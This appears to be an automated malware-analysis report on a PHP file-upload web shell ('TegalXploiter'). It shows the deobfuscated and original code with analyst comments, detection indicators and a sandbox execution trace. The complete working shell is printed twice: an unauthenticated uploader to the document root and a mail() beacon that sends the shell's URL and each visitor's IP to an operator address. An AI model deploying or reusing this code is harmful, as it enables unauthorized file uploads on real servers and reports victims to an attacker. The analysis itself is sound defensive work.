PHP Malware Analysis

%.php

md5: 1ee6ef53948b0c1d4ca33656adaa4ffa


URLs
  • http://localhost/uploads/%25.php (Traces)


Deobfuscated PHP code

//Powered By Mr.Colded X Mr.Cold//
//Team : 3RROR YOUR SYSTEM //
<title>Home - Root Uplpader </title><center>
<body bgcolor="black">
    <br><br><br><br>
    <br>
    <font color="red" size="5">> TegalXploiter <</font>
<font color="green"></center><br><br>
    <center>
<?php 
// --- Analyst notes: file-upload web shell (form-driven, no auth) ---
// Static indicators usable for detection: the banner strings "TegalXploiter",
// "home uploader", "Sukses Cok!" and the form field names 'idx_file'/'upload'.
// Runtime indicator: new files appearing in DOCUMENT_ROOT written by the
// web-server account, with no corresponding application upload event.
//
// Dead code: $uploaddir/$uploadfile are assigned here and never referenced
// again in this script. The hard-coded XAMPP path and the 'userfile' field
// look like leftovers from an earlier variant; the live path uses 'idx_file'.
// Recorded trace: basename() received NULL and returned '', so $uploadfile
// ended up equal to the bare directory string.
$uploaddir = 'C:/xampp/htdocs/kampungkb/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
// Banner. php_uname() discloses the host OS/kernel string to any visitor
// (the trace shows the full 'Linux ... x86_64' string being returned).
echo "home uploader<br>";
echo "<b>" . php_uname() . "</b><br>";
// Self-posting multipart form: file field 'idx_file', submit field 'upload'.
echo "<form method='post' enctype='multipart/form-data'>\n      <input type='file' name='idx_file'>\n      <input type='submit' name='upload' value='Upload'>\n      </form>";
// Destination = web server document root + the client-supplied filename, used
// verbatim: no extension allow-list, no is_uploaded_file()/move_uploaded_file(),
// no size or MIME checks. On the traced GET request $files was NULL, giving
// $dest = '/var/www/html/'.
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root . '/' . $files;
// The write happens only on a POST carrying the 'upload' field (the traced
// request never entered this branch). Preferred target is the document root,
// which makes the dropped file web-reachable; if that is not writable it falls
// back to a relative path, i.e. the script's current working directory.
// Both copy() calls are '@'-suppressed, so a failed write leaves no PHP
// warning; the only observable result is the echoed status text
// (Indonesian: "Sukses" = success, "Gagal" = failed).
if (isset($_POST['upload'])) {
    if (is_writable($root)) {
        if (@copy($_FILES['idx_file']['tmp_name'], $dest)) {
            // $web already ends in '/', so the echoed link contains '//'.
            $web = "http://" . $_SERVER['HTTP_HOST'] . "/";
            echo "Sukses Cok! -> <a href='{$web}/{$files}' target='_blank'><b><u>{$web}/{$files}</u></b></a>";
        } else {
            echo "Gagal Upload Di Document Root.";
        }
    } else {
        // Fallback: relative path, written next to wherever the shell runs.
        if (@copy($_FILES['idx_file']['tmp_name'], $files)) {
            echo "Sukses Upload <b>{$files}</b> Di Folder Ini";
        } else {
            echo "Gagal uplod";
        }
    }
}
// --- Analyst notes: operator call-home ("LOGGER") ---
// Runtime tuning for the shell itself: hide PHP errors from the page, remove
// the execution time limit, set the memory limit. The '@' on the two ini_set()
// calls suppresses any warning they raise. In the recorded trace,
// ini_set('output_buffering', 0) and set_time_limit(0) both returned FALSE,
// and ini_set('memory_limit') returned the previous value '128M'.
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
// Recipient list: the same address appears twice.
$tujuanmail = 'tangsel1928@gmail.com, tangsel1928@gmail.com';
// Beacon body: the full URL at which this shell is reachable plus the
// requester's IP. This code sits outside the upload branch, so the mail is
// sent on every request (the traced GET triggered it): the operator learns
// where the shell landed and also sees the address of anyone who visits it.
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix {$x_path} :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
// 4th argument is mail()'s additional-headers parameter; "[ IP ]" is not a
// valid header line. Trace: mail() returned FALSE in the sandbox.
// Detection: outbound mail from the web-server account with subject "LOGGER",
// or addressed to the recipient above, indicates this sample is active.
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");

Execution traces

data/traces/1ee6ef53948b0c1d4ca33656adaa4ffa_trace-1676258570.1289.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:23:16.026702]
1	0	1	0.000259	393480
1	3	0	0.000378	406504	{main}	1		/var/www/html/uploads/%.php	0	0
1		A						/var/www/html/uploads/%.php	11	$uploaddir = 'C:/xampp/htdocs/kampungkb/'
2	4	0	0.000433	406504	basename	0		/var/www/html/uploads/%.php	12	1	NULL
2	4	1	0.000447	406568
2	4	R			''
1		A						/var/www/html/uploads/%.php	12	$uploadfile = 'C:/xampp/htdocs/kampungkb/'
2	5	0	0.000477	406504	php_uname	0		/var/www/html/uploads/%.php	14	0
2	5	1	0.000491	406616
2	5	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/%.php	19	$root = '/var/www/html'
1		A						/var/www/html/uploads/%.php	20	$files = NULL
1		A						/var/www/html/uploads/%.php	21	$dest = '/var/www/html/'
2	6	0	0.000553	406544	ini_set	0		/var/www/html/uploads/%.php	40	2	'output_buffering'	0
2	6	1	0.000568	406616
2	6	R			FALSE
2	7	0	0.000582	406544	ini_set	0		/var/www/html/uploads/%.php	41	2	'display_errors'	0
2	7	1	0.000596	406616
2	7	R			''
2	8	0	0.000609	406544	set_time_limit	0		/var/www/html/uploads/%.php	42	1	0
2	8	1	0.000623	406608
2	8	R			FALSE
2	9	0	0.000636	406576	ini_set	0		/var/www/html/uploads/%.php	43	2	'memory_limit'	'64M'
2	9	1	0.000650	406680
2	9	R			'128M'
2	10	0	0.000664	406576	header	0		/var/www/html/uploads/%.php	44	1	'Content-Type: text/html; charset=UTF-8'
2	10	1	0.000680	406752
2	10	R			NULL
1		A						/var/www/html/uploads/%.php	45	$tujuanmail = 'tangsel1928@gmail.com, tangsel1928@gmail.com'
1		A						/var/www/html/uploads/%.php	46	$x_path = 'http://localhost/uploads/%25.php'
1		A						/var/www/html/uploads/%.php	47	$pesan_alert = 'fix http://localhost/uploads/%25.php :p *IP Address : [ 127.0.0.1 ]'
2	11	0	0.000732	406920	mail	0		/var/www/html/uploads/%.php	48	4	'tangsel1928@gmail.com, tangsel1928@gmail.com'	'LOGGER'	'fix http://localhost/uploads/%25.php :p *IP Address : [ 127.0.0.1 ]'	'[ 127.0.0.1 ]'
2	11	1	0.001641	407064
2	11	R			FALSE
1	3	1	0.001704	406880
			0.001746	314832
TRACE END   [2023-02-13 01:23:16.028308]


Generated HTML code

<html><head>
<title>400 Bad Request</title>
</head><body>
<h1>Bad Request</h1>
<p>Your browser sent a request that this server could not understand.<br>
</p>
<hr>
<address>Apache/2.4.52 (Ubuntu) Server at localhost Port 80</address>

</body></html>

Original PHP code

//Powered By Mr.Colded X Mr.Cold//
//Team : 3RROR YOUR SYSTEM //
<title>Home - Root Uplpader </title><center>
<body bgcolor="black">
    <br><br><br><br>
    <br>
    <font color="red" size="5">> TegalXploiter <</font>
<font color="green"></center><br><br>
    <center>
<?php
// --- Analyst notes: file-upload web shell (form-driven, no auth) ---
// Static indicators usable for detection: the banner strings "TegalXploiter",
// "home uploader", "Sukses Cok!" and the form field names 'idx_file'/'upload'.
// Runtime indicator: new files appearing in DOCUMENT_ROOT written by the
// web-server account, with no corresponding application upload event.
//
// Dead code: $uploaddir/$uploadfile are assigned here and never referenced
// again. The hard-coded XAMPP path and the 'userfile' field look like
// leftovers from an earlier variant; the live path uses 'idx_file' below.
// Recorded trace: basename() received NULL and returned ''.
$uploaddir = 'C:/xampp/htdocs/kampungkb/';
$uploadfile = $uploaddir . basename($_FILES['userfile']['name']);
// Banner. php_uname() discloses the host OS/kernel string to any visitor
// (the trace shows the full 'Linux ... x86_64' string being returned).
echo "home uploader<br>";
echo "<b>".php_uname()."</b><br>";
// Self-posting multipart form: file field 'idx_file', submit field 'upload'.
echo "<form method='post' enctype='multipart/form-data'>
      <input type='file' name='idx_file'>
      <input type='submit' name='upload' value='Upload'>
      </form>";
// Destination = web server document root + the client-supplied filename, used
// verbatim: no extension allow-list, no is_uploaded_file()/move_uploaded_file(),
// no size or MIME checks. On the traced GET request $files was NULL, giving
// $dest = '/var/www/html/'.
$root = $_SERVER['DOCUMENT_ROOT'];
$files = $_FILES['idx_file']['name'];
$dest = $root.'/'.$files;
// The write happens only on a POST carrying the 'upload' field (the traced
// request never entered this branch). Preferred target is the document root,
// which makes the dropped file web-reachable; if that is not writable it falls
// back to a relative path, i.e. the script's current working directory.
// Both copy() calls are '@'-suppressed, so a failed write leaves no PHP
// warning; the only observable result is the echoed status text
// (Indonesian: "Sukses" = success, "Gagal" = failed).
if(isset($_POST['upload'])) {
    if(is_writable($root)) {
        if(@copy($_FILES['idx_file']['tmp_name'], $dest)) {
            // $web already ends in '/', so the echoed link contains '//'.
            $web = "http://".$_SERVER['HTTP_HOST']."/";
            echo "Sukses Cok! -> <a href='$web/$files' target='_blank'><b><u>$web/$files</u></b></a>";
        } else {
            echo "Gagal Upload Di Document Root.";
        }
    } else {
        // Fallback: relative path, written next to wherever the shell runs.
        if(@copy($_FILES['idx_file']['tmp_name'], $files)) {
            echo "Sukses Upload <b>$files</b> Di Folder Ini";
        } else {
            echo "Gagal uplod";
        }
    }
}
?>
<?php
// --- Analyst notes: operator call-home ("LOGGER") ---
// Runtime tuning for the shell itself: hide PHP errors from the page, remove
// the execution time limit, set the memory limit. The '@' on the two ini_set()
// calls suppresses any warning they raise. In the recorded trace,
// ini_set('output_buffering', 0) and set_time_limit(0) both returned FALSE,
// and ini_set('memory_limit') returned the previous value '128M'.
@ini_set('output_buffering', 0);
@ini_set('display_errors', 0);
set_time_limit(0);
ini_set('memory_limit', '64M');
header('Content-Type: text/html; charset=UTF-8');
// Recipient list: the same address appears twice.
$tujuanmail = 'tangsel1928@gmail.com, tangsel1928@gmail.com';
// Beacon body: the full URL at which this shell is reachable plus the
// requester's IP. This second PHP block is outside the upload branch, so the
// mail goes out on every request (the traced GET triggered it): the operator
// learns where the shell landed and sees the address of anyone who visits it.
$x_path = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
$pesan_alert = "fix $x_path :p *IP Address : [ " . $_SERVER['REMOTE_ADDR'] . " ]";
// 4th argument is mail()'s additional-headers parameter; "[ IP ]" is not a
// valid header line. Trace: mail() returned FALSE in the sandbox.
// Detection: outbound mail from the web-server account with subject "LOGGER",
// or addressed to the recipient above, indicates this sample is active.
mail($tujuanmail, "LOGGER", $pesan_alert, "[ " . $_SERVER['REMOTE_ADDR'] . " ]");
?>